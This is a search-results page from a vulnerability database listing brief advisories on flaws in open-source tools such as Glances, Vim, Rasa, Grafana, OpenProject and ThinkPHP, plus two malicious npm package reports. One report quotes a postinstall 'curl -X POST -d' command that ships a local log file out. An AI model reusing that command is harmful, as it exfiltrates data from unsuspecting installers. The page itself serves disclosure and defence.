Lucene search
K

19559 matches found

OSV
OSV
added 2026/06/29 11:50 a.m.6 views

PYSEC-2026-371 Open Source Kubectl MCP Server vulnerable to arbitrary code execution via user interaction with crafted HTML page

An issue in Open Source Kubectl MCP Server v1.1.1 allows attackers to execute arbitrary code on a victim system via user interaction with a crafted HTML page...

9.8CVSS6.2AI score0.00578EPSS
Exploits0References6
OSV
OSV
added 2026/06/29 11:50 a.m.6 views

PYSEC-2026-514 Rasa Allows Remote Code Execution via Remote Model Loading

Vulnerability A vulnerability has been identified in Rasa Pro and Rasa Open Source that enables an attacker who has the ability to load a maliciously crafted model remotely into a Rasa instance to achieve Remote Code Execution. The prerequisites for this are: - The HTTP API must be enabled on the...

9CVSS5.9AI score0.00895EPSS
Exploits0References6
Fedora
Fedora
added 2026/06/28 1:10 a.m.8 views

[SECURITY] Fedora 43 Update: moby-engine-29.6.0-1.fc43

Docker is an open source project to build, ship and run any application as a lightweight container. Docker containers are both hardware-agnostic and platform-agnostic. This means they can run anywhere, from your laptop to the largest EC2 compute instance a nd everything in between =E2=80=94 and...

9.1CVSS6.3AI score0.00513EPSS
Exploits0
Positive Technologies
Positive Technologies
added 2026/06/26 12:0 a.m.10 views

PT-2026-52905

Name of the Vulnerable Software and Affected Versions OpenProject versions prior to 17.4.0 Description An issue in the RelationQuery performance optimization allows authenticated users to bypass the Relation.visible scope. By providing an arbitrary work package ID through the involved, fromId, or...

6.5CVSS5.9AI score0.00286EPSS
Exploits0References3
Positive Technologies
Positive Technologies
added 2026/06/26 12:0 a.m.13 views

PT-2026-52911

Name of the Vulnerable Software and Affected Versions OpenProject versions prior to 17.3.3 OpenProject versions prior to 17.4.1 Description Cache store poisoning allows for Remote Code Execution RCE, a process where an attacker executes arbitrary code on a remote machine. Recommendations Update t...

9.6CVSS6.2AI score0.00233EPSS
Exploits0References3
Redos
Redos
added 2026/06/26 12:0 a.m.9 views

ROS-20260626-73-0020

The vulnerability of the ngxhttprewritemodule module in NGINX Plus and NGINX Open Source web servers is related to buffer overflows in dynamic memory. Exploiting this vulnerability allows a malicious actor to execute arbitrary code or cause a denial-of-service attack by sending a specially crafte...

9.2CVSS6.3AI score0.04261EPSS
Exploits3
OSV
OSV
added 2026/06/25 7:16 p.m.3 views

UBUNTU-CVE-2026-46607

Glances is an open-source system cross-platform monitoring tool. Prior to 4.5.5, glances/outdated.py uses pickle.load to read a version-check cache file stored at a predictable, world-accessible path /.cache/glances/glances-version.db or $XDGCACHEHOME/glances/glances-version.db. No integrity chec...

7.8CVSS6.4AI score0.00303EPSS
Exploits0References3
OSV
OSV
added 2026/06/25 6:43 p.m.3 views

GO-2026-5219 Grafana OSS: Authorization bypass allows users with Editor role to modify protected webhook URLs without permissions in github.com/grafana/grafana

Grafana OSS: Authorization bypass allows users with Editor role to modify protected webhook URLs without permissions in github.com/grafana/grafana. NOTE: The source advisory for this report contains additional versions that could not be automatically mapped to standard Go module versions. If this...

5.4CVSS5.8AI score0.00238EPSS
Exploits0References5
Debian CVE
Debian CVE
added 2026/06/25 6:4 p.m.5 views

CVE-2026-46607

Glances is an open-source system cross-platform monitoring tool. Prior to 4.5.5, glances/outdated.py uses pickle.load to read a version-check cache file stored at a predictable, world-accessible path /.cache/glances/glances-version.db or $XDGCACHEHOME/glances/glances-version.db. No integrity chec...

7.8CVSS6.5AI score0.00303EPSS
Exploits0
Debian CVE
Debian CVE
added 2026/06/25 6:3 p.m.5 views

CVE-2026-53925

Glances is an open-source system cross-platform monitoring tool. From 4.0.8 until 4.5.5, the securepopen function in glances/secure.py interprets file redirection, | pipe, and && command chaining operators in command strings. These operators are applied without any validation on the target file...

7.8CVSS6.1AI score0.00184EPSS
Exploits0
Debian CVE
Debian CVE
added 2026/06/25 6:2 p.m.5 views

CVE-2026-46606

Glances is an open-source system cross-platform monitoring tool. Prior to 4.5.5, the Glances KVM/QEMU monitoring engine glances/plugins/vms/engines/virsh.py passes VM domain names, read directly from virsh list --all output, into f-string command templates that are processed by securepopen...

7.8CVSS6.2AI score0.00213EPSS
Exploits0
Debian CVE
Debian CVE
added 2026/06/25 6:0 p.m.5 views

CVE-2026-46611

Glances is an open-source system cross-platform monitoring tool. Prior to 4.5.5, the Glances XML-RPC server glances -s, implemented in glances/server.py does not validate the HTTP Host header, leaving it vulnerable to DNS rebinding attacks. An attacker can exploit DNS rebinding to exfiltrate the...

5.3CVSS5.9AI score0.00156EPSS
Exploits0
IBM Security Bulletins
IBM Security Bulletins
added 2026/06/25 5:32 p.m.3 views

Security Bulletin: SSRF Vulnerability in Langflow OSS Legacy Components Bypasses Protection

Summary Langflow OSS versions = 1.9.3 contain SSRF vulnerability in legacy RSS Reader and SearXNG components that bypass SSRF protection introduced in v1.9.3. RSSReaderComponent calls requests.getself.rssurl directly on user input without validateurlforssrf check, completely bypassing protection...

8.2CVSS5.9AI score0.00199EPSS
Exploits0Affected Software1
NVD
NVD
added 2026/06/25 5:16 p.m.13 views

CVE-2026-55411

ToolJet is the open-source foundation am AI-native platform for building and deploying internal tools, workflows and AI agents. Prior to 3.20.1780-lts, the authenticated endpoint POST /api/data-sources/decrypt returns the decrypted plaintext for any credential whose credentialid is supplied in th...

6.8CVSS0.00126EPSS
Exploits0References1
OSV
OSV
added 2026/06/25 5:6 p.m.7 views

MAL-2026-6466 Malicious code in gx-npm-feature-flags (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 7fcad1b944d9ceb92389673398df9f471911a788fe608774a3298c69900bb1c7 [email protected] is a dependency-confusion squat max-semver 99.99.99 on a gx--prefixed name to outrank a private internal package that...

5.8AI score
Exploits0References2
OSV
OSV
added 2026/06/25 4:16 p.m.3 views

UBUNTU-CVE-2026-57451

Vim is an open source, command line text editor. Prior to 9.2.0670, gettextprops in src/textprop.c reads a uint16 property count stored inline after a line's text and returns it as the number of 32-byte textpropT entries that follow. The only check is a floor that guarantees room for a single...

6.1CVSS5.8AI score0.00113EPSS
Exploits0References3
Debian CVE
Debian CVE
added 2026/06/25 3:34 p.m.5 views

CVE-2026-55693

Vim is an open source, command line text editor. Prior to 9.2.0653, the treecountwords function in src/spellfile.c fills in the word-count fields of a spell-file word trie by walking it iteratively with a depth counter. The counter is bounded only by the trie structure itself; it is never checked...

8.4CVSS5.8AI score0.00126EPSS
Exploits0
Debian CVE
Debian CVE
added 2026/06/25 2:34 p.m.6 views

CVE-2026-57437

Nokogiri is an open source XML and HTML library for the Ruby programming language. Prior to 1.19.4, Nokogiri::XML::XPathContext did not keep its source document alive for garbage collection. If an XPathContext outlived its document and the document was collected, evaluating an XPath expression...

6.3CVSS5.9AI score0.00312EPSS
Exploits0
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/25 10:51 a.m.13 views

Malicious code in dttsdee (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 56d01c47d29d1f8f25a737be42dd77d02a2c13a00afb808740142197a79150e9 package.json declares a postinstall lifecycle script that runs automatically on npm install: curl -X POST -d "$cat /data/logs/monitor-2026-06-25.log"...

6AI score
Exploits0References1
Nuclei
Nuclei
added 2026/06/25 5:45 a.m.20 views

ThinkPHP < 3.2.4 - Remote Code Execution

ThinkPHP before 3.2.4, as used in Open Source BMS v1.1.1 and other products, allows Remote Command Execution via the s parameter in index.php through the invokefunction functionality. id: CVE-2019-9082 info: name: ThinkPHP 3.2.4 - Remote Code Execution author: 0xanis severity: high description: |...

9.3CVSS7.5AI score0.97419EPSS
Exploits8References5
Rows per page
Query Builder